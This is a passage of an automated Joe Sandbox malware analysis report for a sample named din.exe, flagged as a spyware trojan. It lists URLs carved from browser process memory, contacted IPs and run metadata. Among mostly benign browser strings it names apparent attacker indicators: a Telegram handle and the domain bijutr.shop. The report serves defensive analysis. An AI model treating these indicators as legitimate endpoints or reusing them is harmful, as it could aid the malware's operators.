                                                                                                    https://anglebug.com/7714chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://unisolated.invalid/chrome.exe, 00000015.00000002.1889497169.000036EC009B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://photos.google.com?referrer=CHROME_NTPchrome.exe, 00000015.00000003.1813167152.000036EC0100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813304700.000036EC01224000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813243843.000036EC011A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://www.google.com/chrome/tips/chrome.exe, 00000015.00000002.1889349825.000036EC00960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1886568019.000036EC001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1888460148.000036EC00714000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1888951306.000036EC00874000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://drive.google.com/?lfhs=2chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://anglebug.com/6248chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://ogs.google.com/widget/callout?eom=1chrome.exe, 00000015.00000003.1853603328.000036EC01C30000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://anglebug.com/6929chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://anglebug.com/5281chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://www.youtube.com/?feature=ytcachrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://issuetracker.google.com/255411748msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://docs.google.com/document/u/0/create?usp=chrome_actionschrome.exe, 00000015.00000002.1888831081.000036EC0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887566216.000036EC004CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1888720428.000036EC007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890444399.000036EC00C44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://permanently-removed.invalid/oauth2/v4/tokenmsedge.exe, 0000001A.00000003.1946356419.000033FC00280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://anglebug.com/7246chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://anglebug.com/7369chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://anglebug.com/7489chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://duckduckgo.com/?q=chrome.exe, 00000015.00000002.1889422702.000036EC00994000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890526329.000036EC00C64000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://chrome.google.com/webstorechrome.exe, 00000015.00000002.1887499248.000036EC004A0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000002.2013516926.000033FC0018C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://cdnjs.cloudflare.com/ajax/libs/mathjax/offscreendocument_main.js.28.dr, service_worker_bin_prod.js.28.drfalse
                                                                                                                                          		high
                                                                                                                                          http://polymer.github.io/PATENTS.txtchrome.exe, 00000015.00000003.1810575976.000036EC010AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1891087879.000036EC00D98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813167152.000036EC0100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1886957092.000036EC002F7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1812347913.000036EC00A24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813304700.000036EC01224000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810894201.000036EC010C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810519278.000036EC0109C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810791157.000036EC010FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1812330053.000036EC00CDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810832476.000036EC00F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1812535851.000036EC00F94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1812369339.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813243843.000036EC011A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://google-ohttp-relay-join.fastly-edge.com/lichrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://google-ohttp-relay-join.fastly-edge.com/Kichrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icochrome.exe, 00000015.00000002.1890444399.000036EC00C44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Centered.com, 00000010.00000002.2511212065.0000000006B2B000.00000004.00000800.00020000.00000000.sdmp, Web Data.28.dr, XTRIWB.16.dr, 3OHLNY.16.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://t.me/k04aelm0nk3Mozilla/5.0Centered.com, 00000010.00000003.1613510624.00000000049CD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://www.autoitscript.com/autoit3/XCentered.com, 00000010.00000000.1274462155.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp, Dumb.0.dr, Centered.com.2.drfalse
                                                                                                                                                        		high
                                                                                                                                                        https://issuetracker.google.com/161903006msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://www.ecosia.org/newtab/chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, XTRIWB.16.drfalse
                                                                                                                                                            		high
                                                                                                                                                            https://chrome.google.com/webstore?hl=en6chrome.exe, 00000015.00000002.1893748702.000036EC01218000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1856113571.000036EC0121C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1835607263.000036EC01218000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://www.google.com/Chartk3chrome.exe, 00000015.00000002.1888858362.000036EC0081C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://duckduckgo.com/favicon.icochrome.exe, 00000015.00000002.1890526329.000036EC00C64000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actionschrome.exe, 00000015.00000002.1888594099.000036EC00748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887635623.000036EC004FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1891145184.000036EC00DA0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacychrome.exe, 00000015.00000002.1888775978.000036EC007D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887531372.000036EC004B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://permanently-removed.invalid/chrome/blank.htmlmsedge.exe, 0000001A.00000003.1946356419.000033FC00280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://anglebug.com/3078chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://anglebug.com/7553chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://anglebug.com/5375chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://bzib.nelreports.net/api/report?cat=bingbusinessReporting and NEL.29.drfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://permanently-removed.invalid/v1/issuetokenmsedge.exe, 0000001A.00000003.1946356419.000033FC00280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://ogs.googchrome.exe, 00000015.00000002.1886075546.000036EC000FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://anglebug.com/5371chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      http://anglebug.com/4722chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://m.google.com/devicemanagement/data/apichrome.exe, 00000015.00000002.1886568019.000036EC001C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://permanently-removed.invalid/reauth/v1beta/users/msedge.exe, 0000001A.00000003.1946356419.000033FC00280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://docs.google.com/presentation/u/0/create?usp=chrome_actionschrome.exe, 00000015.00000002.1892929367.000036EC00F10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1888594099.000036EC00748000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887635623.000036EC004FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              http://anglebug.com/7556chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://chromewebstore.google.com/chrome.exe, 00000015.00000002.1885705642.000036EC0001C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000002.2013516926.000033FC0018C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.28.drfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgCentered.com, 00000010.00000002.2511212065.0000000006CFA000.00000004.00000800.00020000.00000000.sdmp, Centered.com, 00000010.00000002.2503014570.00000000019DD000.00000004.00000020.00020000.00000000.sdmp, Z58QQQ.16.drfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://chrome.google.com/webstore/manifest.json.28.drfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://clients4.google.com/chrome-syncchrome.exe, 00000015.00000002.1886568019.000036EC001C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 00000015.00000003.1844697158.000036EC0140C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://permanently-removed.invalid/RotateBoundCookiesmsedge.exe, 0000001A.00000003.1946356419.000033FC00280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            http://anglebug.com/6692chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://issuetracker.google.com/258207403msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                http://anglebug.com/3502chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  http://anglebug.com/3623msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    http://anglebug.com/3625msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      http://anglebug.com/3624msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        https://docs.google.com/presentation/Jchrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          https://t.mCentered.com, 00000010.00000003.1613361743.0000000001A2D000.00000004.00000020.00020000.00000000.sdmp, Centered.com, 00000010.00000003.1613403896.000000000494B000.00000004.00000800.00020000.00000000.sdmp, Centered.com, 00000010.00000003.1613621165.00000000019D1000.00000004.00000020.00020000.00000000.sdmp, Centered.com, 00000010.00000003.1613642833.000000000491D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            http://anglebug.com/5007chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887499248.000036EC004A0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                              https://drive.google.com/drive/installwebapp?usp=chrome_defaultchrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887024010.000036EC00300000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                http://anglebug.com/3862chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                                  https://chrome.google.com/webstoreLDDiscoverchrome.exe, 00000015.00000003.1809015883.000036EC00CDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813504638.000036EC00394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1812756724.000036EC00E98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1815011831.000036EC00CEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813667267.000036EC00E98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887499248.000036EC004A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                                    https://www.ecosia.org/search?q=&addon=opensearchchrome.exe, 00000015.00000002.1890444399.000036EC00C44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                                      http://anglebug.com/4836chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                                        https://issuetracker.google.com/issues/166475273msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                                          https://ch.search.yahoo.com/favicon.icochrome.exe, 00000015.00000002.1890526329.000036EC00C64000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                                            https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29chrome.exe, 00000015.00000003.1844697158.000036EC0140C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                                              https://docs.google.com/presentation/:chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                		high

                                                                                                                                                                                                                                                World Map of Contacted IPs

                                                                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                                                                                                Public IPs

                                                                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                149.154.167.99
                                                                                                                                                                                                                                                		t.meUnited Kingdom
                                                                                                                                                                                                                                                		62041TELEGRAMRUfalse
                                                                                                                                                                                                                                                18.238.49.74
                                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                                		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                172.217.21.36
                                                                                                                                                                                                                                                		www.google.comUnited States
                                                                                                                                                                                                                                                		15169GOOGLEUSfalse
                                                                                                                                                                                                                                                20.110.205.119
                                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                                		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                188.245.216.205
                                                                                                                                                                                                                                                		bijutr.shopIran (ISLAMIC Republic Of)
                                                                                                                                                                                                                                                		16322PARSONLINETehran-IRANIRfalse
                                                                                                                                                                                                                                                204.79.197.219
                                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                                		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                142.250.181.65
                                                                                                                                                                                                                                                		googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                                                                                                                		15169GOOGLEUSfalse
                                                                                                                                                                                                                                                172.64.41.3
                                                                                                                                                                                                                                                		chrome.cloudflare-dns.comUnited States
                                                                                                                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                51.104.15.253
                                                                                                                                                                                                                                                		unknownUnited Kingdom
                                                                                                                                                                                                                                                		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                239.255.255.250
                                                                                                                                                                                                                                                		unknownReserved
                                                                                                                                                                                                                                                		unknownunknownfalse
                                                                                                                                                                                                                                                23.209.72.21
                                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                                		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                23.44.201.12
                                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                                		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                23.44.201.36
                                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                                		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                23.44.201.32
                                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                                		20940AKAMAI-ASN1EUfalse

                                                                                                                                                                                                                                                Private

                                                                                                                                                                                                                                                IP
                                                                                                                                                                                                                                                192.168.2.7
                                                                                                                                                                                                                                                127.0.0.1

                                                                                                                                                                                                                                                General Information

                                                                                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                Analysis ID:1581179
                                                                                                                                                                                                                                                Start date and time:2024-12-27 07:08:15 +01:00
                                                                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                Overall analysis duration:0h 8m 15s
                                                                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                Number of analysed new started processes analysed:38
                                                                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                                                                Sample name:din.exe
                                                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@82/297@21/16
                                                                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                                                                HCA Information:
                                                                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                                                                • Number of executed functions: 79
                                                                                                                                                                                                                                                • Number of non-executed functions: 296
                                                                                                                                                                                                                                                Cookbook Comments:
